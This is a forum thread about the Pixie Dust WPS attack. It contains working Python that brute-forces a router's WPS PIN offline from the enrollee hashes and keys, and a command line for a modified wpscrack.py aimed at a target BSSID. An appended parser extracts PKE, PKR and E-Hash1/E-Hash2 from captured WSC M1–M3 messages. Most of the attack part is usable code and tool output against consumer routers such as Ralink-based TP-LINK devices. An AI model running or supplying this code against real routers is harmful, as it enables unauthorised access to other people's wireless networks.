Hey, can anyone share the method of extracting
- PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2
from cap files?
@dathead
I didn't learn C or cryptology (or maths) this weekend, so I don't really get the details... (at all)
If I understand well, vendors may have used this "random function":
http://opencores.org/ocsvn/openrisc/...t/src/rand.cxx
Thank you for sharing your code, great job :)
Hi guys,
I have coded the Pixie Dust attack only for the case ES1 = ES2 = 0 (Ralink devices). I have used the C code as a test vector for the input data.
You can find it here: https://bitbucket.org/dudux/wpsoffline/
I am running out of time, but I would like to implement the brute force of the PRNG state for Broadcom. After all, I would like to translate it into C for Reaver or bully. But surely someone is a better C programmer and has more time than me.
Code:
import binascii, hashlib, hmac, sys

# Test vector: PK_E and PK_R are the 192-byte DH public keys of the enrollee
# and registrar, E-Hash1/E-Hash2 and AuthKey are 32 bytes each.
PK_E = binascii.unhexlify(
    "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"
    "e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4fe64008a4a47de"
    "50e7fc6409dc750b295565f54f1fe78582d78de0fac72675677cb1c85c5ca46a"
    "5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52f5c6123a1f4997"
    "6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f8f25814dc313cf"
    "7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d4970d313a65746")
PK_R = binascii.unhexlify(
    "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"
    "b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f8a275fcc78e37a"
    "b81e917a376e038595ab980d57898224aed228052f29efa6299f11cd4d7aa562"
    "b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927ef414ea2fd5ced"
    "6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f99adc9d360f7d4"
    "f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f06d69571b9da243")
eHash1 = binascii.unhexlify("c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43")
eHash2 = binascii.unhexlify("3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416")
AuthKey = binascii.unhexlify("d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea")

# Once ES1 and ES2 are known (Ralink: both all-zero), recover the two halves
# of the PIN offline. E-Hash1 = HMAC-SHA256(AuthKey, ES1 || PSK1 || PKE || PKR),
# PSK1 = first 128 bits of HMAC-SHA256(AuthKey, first 4 PIN digits as ASCII),
# and likewise for E-Hash2 / PSK2 with the last 4 digits.
es1 = es2 = b"\x00" * 16

for first_half in range(10000):
    PSK1_guess = hmac.new(AuthKey, ("%04d" % first_half).encode(), hashlib.sha256).digest()[:16]
    eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
    if eHash1 == eHash1_guess:  # first half done
        # the 8th PIN digit is a checksum, so 1000 candidates would be enough here
        for second_half in range(10000):
            PSK2_guess = hmac.new(AuthKey, ("%04d" % second_half).encode(), hashlib.sha256).digest()[:16]
            eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
            if eHash2 == eHash2_guess:
                print("PIN FOUND! %04d%04d" % (first_half, second_half))
                # doWPSprotocolWithPINguessed() #TODO
                sys.exit(0)
Proost!
I forgot to say that I blindly implemented the attack in the proof-of-concept "wpscrack.py". It is only useful for Ralink devices, such as TP-LINK routers.
I have not tested the attack live! This code does the right offline brute-forcing. However, IT HAS NOT BEEN TESTED YET! Feel free to tweak it as you wish or send commit requests.
Usage:
Code:
wpscrack_mod:$ sudo python wpscrack.py -i mon0 -b [BSSID] -s [ESSID] --offline -vv
Updated with a database in the original post :D
dudux, it says "PIN FOUND! 57334196" all the time, for every router.
Still, the attack is not available for Broadcom :confused:
You need to edit the file and put your own data in. I don't know where the PKR, PKE data is in the packets; that's where I'm stuck.
Tried the tool and it is giving me
Code:
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
But I'm trying against Broadcom and not Ralink; as said above, Broadcom is not implemented yet.
I hope you guys keep developing this subject. It's very interesting, but beyond my personal understanding to put into practice, so I'll have to wait.
Would it be feasible to add an import-from-cap feature? I guess that would get some testers running. Thanks everyone.
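Since the opening post asks where PKe, PKr, E-Hash1 and E-Hash2 live in a capture, and two later replies are stuck on the same point (where PKR/PKE are in the packets, and an import-from-cap feature), here is an added example that locates them. It is not code from this thread or from wpscrack/reaver/bully. It assumes you have already pulled the EAP packets out of the 802.11/EAPOL frames with your capture tool of choice; it then parses the EAP-Expanded/WSC framing and the WSC TLV attributes (type IDs and message-type values as in the Wi-Fi Simple Configuration spec and hostapd's wps_defs.h). PKE and the enrollee nonce are in M1, PKR and the registrar nonce in M2, E-Hash1/E-Hash2 in M3. AuthKey is never on the wire: it is derived from the Diffie-Hellman shared secret, so from someone else's capture you cannot recover it without a private key; when you run the registrar side yourself (as reaver does) you know your own private key and can compute it. The sample M1/M2/M3 messages at the bottom are constructed for this example, not captured traffic.

```python
"""Locate the Pixie Dust inputs in captured WPS (WSC) registration messages.

Added example, not code from the thread or from wpscrack/reaver/bully.
Framing constants follow the Wi-Fi Simple Configuration spec (same values
as hostapd's wps_defs.h). SAMPLE_PACKETS below are constructed, not captured.
"""
import struct

WFA_VENDOR_ID = b"\x00\x37\x2a"   # Wi-Fi Alliance SMI code in the EAP-Expanded header
WFA_SIMPLECONFIG = 1              # vendor type: Simple Configuration
OP_WSC_MSG = 4                    # opcode that carries M1..M8 (Start/ACK/NACK/Done carry none)
FLAG_MF, FLAG_LF = 0x01, 0x02     # more fragments / length field present

# WSC attribute IDs (16-bit type, 16-bit length, value)
ATTR_MSG_TYPE = 0x1022
ATTR_ENROLLEE_NONCE = 0x101A
ATTR_REGISTRAR_NONCE = 0x1039
ATTR_MAC_ADDR = 0x1020
ATTR_PUBLIC_KEY = 0x1032
ATTR_E_HASH1 = 0x1014
ATTR_E_HASH2 = 0x1015
MSG_M1, MSG_M2, MSG_M3 = 0x04, 0x05, 0x07


def parse_wsc_attrs(payload):
    """Split a WSC message body into {attr_id: value}; rejects truncated TLVs."""
    attrs, off = {}, 0
    while off + 4 <= len(payload):
        attr_id, length = struct.unpack_from(">HH", payload, off)
        off += 4
        if off + length > len(payload):
            raise ValueError("truncated WSC attribute 0x%04x" % attr_id)
        attrs[attr_id] = payload[off:off + length]
        off += length
    if off != len(payload):
        raise ValueError("trailing bytes after last WSC attribute")
    return attrs


def wsc_body_from_eap(eap):
    """Return the WSC attribute bytes of one EAP packet, or None if it is not a
    WSC_MSG (EAP type 254 / WFA vendor id / vendor type 1 / opcode WSC_MSG)."""
    if len(eap) < 14:
        return None
    code, ident, length, eap_type = struct.unpack_from(">BBHB", eap, 0)
    if eap_type != 254 or length > len(eap) or eap[5:8] != WFA_VENDOR_ID:
        return None
    vendor_type, opcode, flags = struct.unpack_from(">IBB", eap, 8)
    if vendor_type != WFA_SIMPLECONFIG or opcode != OP_WSC_MSG:
        return None
    if flags & FLAG_MF:
        raise ValueError("fragmented WSC message: reassemble the fragments first")
    off = 14 + (2 if flags & FLAG_LF else 0)   # LF adds a 2-byte total-length field
    return eap[off:length]


def pixie_inputs(eap_packets):
    """Collect PKE + enrollee nonce (M1), PKR + registrar nonce (M2) and
    E-Hash1/E-Hash2 (M3). AuthKey is not in any message and is not returned."""
    found = {}
    for eap in eap_packets:
        body = wsc_body_from_eap(eap)
        if body is None:
            continue
        attrs = parse_wsc_attrs(body)
        mt = attrs.get(ATTR_MSG_TYPE)
        mtype = mt[0] if mt else None
        if mtype == MSG_M1:
            found["pke"] = attrs[ATTR_PUBLIC_KEY]
            found["e_nonce"] = attrs[ATTR_ENROLLEE_NONCE]
            found["e_mac"] = attrs.get(ATTR_MAC_ADDR)
        elif mtype == MSG_M2:
            found["pkr"] = attrs[ATTR_PUBLIC_KEY]
            found["r_nonce"] = attrs[ATTR_REGISTRAR_NONCE]
        elif mtype == MSG_M3:
            found["e_hash1"] = attrs[ATTR_E_HASH1]
            found["e_hash2"] = attrs[ATTR_E_HASH2]
    return found


# --- constructed sample exchange (not captured traffic) ---
def _attr(attr_id, value):
    return struct.pack(">HH", attr_id, len(value)) + value

def _eap_wsc_msg(code, ident, body):
    hdr = struct.pack(">BBHB", code, ident, 14 + len(body), 254) + WFA_VENDOR_ID
    return hdr + struct.pack(">IBB", WFA_SIMPLECONFIG, OP_WSC_MSG, 0) + body

SAMPLE_PKE = bytes(i % 256 for i in range(192))          # stand-in for a 192-byte DH key
SAMPLE_PKR = bytes((255 - i) % 256 for i in range(192))
SAMPLE_E_HASH1, SAMPLE_E_HASH2 = bytes([0x11] * 32), bytes([0x22] * 32)
SAMPLE_PACKETS = [
    _eap_wsc_msg(1, 1, _attr(ATTR_MSG_TYPE, b"\x04") + _attr(ATTR_ENROLLEE_NONCE, b"\xaa" * 16)
                 + _attr(ATTR_MAC_ADDR, b"\x00\x11\x22\x33\x44\x55") + _attr(ATTR_PUBLIC_KEY, SAMPLE_PKE)),
    _eap_wsc_msg(2, 1, _attr(ATTR_MSG_TYPE, b"\x05") + _attr(ATTR_REGISTRAR_NONCE, b"\xbb" * 16)
                 + _attr(ATTR_PUBLIC_KEY, SAMPLE_PKR)),
    _eap_wsc_msg(1, 2, _attr(ATTR_MSG_TYPE, b"\x07") + _attr(ATTR_E_HASH1, SAMPLE_E_HASH1)
                 + _attr(ATTR_E_HASH2, SAMPLE_E_HASH2)),
]

if __name__ == "__main__":
    for name, value in sorted(pixie_inputs(SAMPLE_PACKETS).items()):
        print("%-7s %s" % (name, value.hex()))
```

The values this returns are exactly what the offline script above expects for PK_E, PK_R, eHash1 and eHash2; only AuthKey still has to come from the side of the exchange you control.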